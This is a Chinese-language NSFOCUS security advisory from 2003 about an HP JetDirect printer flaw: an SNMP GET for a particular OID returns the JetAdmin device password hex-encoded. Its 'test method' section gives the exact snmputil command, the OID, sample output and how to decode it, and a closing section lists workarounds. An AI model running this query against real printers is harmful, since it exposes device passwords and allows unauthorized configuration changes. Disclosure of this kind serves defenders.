首页 -> 安全研究

安全研究

安全漏洞
HP JetDirect打印机SNMP JetAdmin设备密码泄露漏洞

发布日期:2003-03-03
更新日期:2003-03-10

受影响系统:
HP JetDirect EX Plus (J2591A)
HP JetDirect 600N (J3110A/J3111A/J3113A)
HP JetDirect 400N (J2552A/J2552B)
HP JetDirect 300x (J3263A)
HP JetDirect  J3258B
描述:
BUGTRAQ  ID: 7001

JetDirect打印机是一款惠普公司开发的集成网络功能的打印机。

HP JetDirect打印机对某些SNMP GET请求缺少正确处理,远程攻击者可以利用这个漏洞获得打印机设备密码,更改打印机设置。

攻击者通过发送特殊的SNMP GET请求给有此漏洞的打印机,打印机会返回以十六进制编码的设备密码给请求者,通过这个密码远程用户可以访问和更改打印机的配置设置。

此漏洞和"HP JetDirect打印机SNMP GET获取管理员口令远程漏洞"( http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=3172 )不同,请求的OID不同。

<*来源:Sven Pechler (helpdesk@tm.tue.nl
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104670979906626&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Sven Pechler (helpdesk@tm.tue.nl)提供了如下测试方法:

使用SNMP工具集读取打印机下面的OID:

.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-
printer.generalDeviceStatus.gdPasswords
(数字格式为: .1.3.6.1.4.1.11.2.3.9.1.1.13.0)

如:

C:\>snmputil get xxx.xxx.xxx.xxx public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
Value    = String
<0x41><0x42><0x43><0x44><0x45><0x46><0x3d><0x31><0x30><0x38><0
x3b><0x00><0x00><0x00><0x00> ..etc...

获得的字符串以ASCII形式为: ABCDEF=108;
Web Jetadmin设备密码为'='号前的字符,如这里为:ABCDEF

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 设置Web Jetadmin设备密码为空。

* 设置Telnet服务密码(不要为空)。

* 建立访问控制列表限制只有可信IP访问Telnet控制台。

厂商补丁:

HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://itrc.hp.com

浏览次数:3859
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障